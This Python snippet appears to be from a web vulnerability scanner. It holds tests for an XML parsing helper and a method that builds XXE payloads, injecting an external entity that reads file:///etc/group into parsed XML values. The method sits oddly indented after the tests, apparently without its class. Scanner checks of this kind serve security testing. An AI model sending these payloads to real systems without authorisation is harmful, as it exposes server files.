def test_parse_xml_negative():
    # wrong format
    test = utility.parse_xml("not-xml")
    assert not test

    # bad xml
    test = utility.parse_xml("<test><error></test>")
    assert not test
def test_parse_xml_positive(xmls):
    """parse_xml must return an XmlDocument for each well-formed fixture in ``xmls``."""
    # fixture order: one text, two texts, inner text, no text
    labels = ("one text", "two texts", "inner text", "no text")
    for index, label in enumerate(labels):
        document = utility.parse_xml(xmls[index])
        assert isinstance(document, XmlDocument), label
    def payloads(self, url, target, value):
        """
        Return the check's payloads for ``target``.

        The static payloads in ``self._payloads`` are always included. When
        ``value`` has the shape of an XML document (first character ``<``,
        last character ``>``) and ``utility.parse_xml`` accepts it, one dynamic
        payload is appended per replacement the parsed document yields: the
        document's text instances are swapped for an entity reference named
        after ``self._random`` and prefixed with a DTD declaring that entity.
        :param url: url value (not used by this method)
        :param target: target name (not used by this method)
        :param value: target value; only bracket-delimited strings are parsed
        :return: list of payloads (a new list; ``self._payloads`` is left untouched)
        """
        # DOCTYPE name is taken from the parsed root tag, the entity name from self._random
        template = '<?xml version="1.0"?><!DOCTYPE {} [<!ENTITY {} SYSTEM "file:///etc/group">]>'

        dynamics = []
        looks_like_xml = value and value[0] == '<' and value[-1] == '>'
        if looks_like_xml:
            parsed = utility.parse_xml(value)
            # a falsy parse result means the value was not well-formed: no dynamic payloads
            if parsed:
                dtd = template.format(parsed.root_tag, self._random)
                entity = ''.join(('&', self._random, ';'))
                dynamics = [dtd + replacement for replacement in parsed.replace(entity)]

        # static first, then dynamic; concatenation yields a fresh list each call
        return self._payloads + dynamics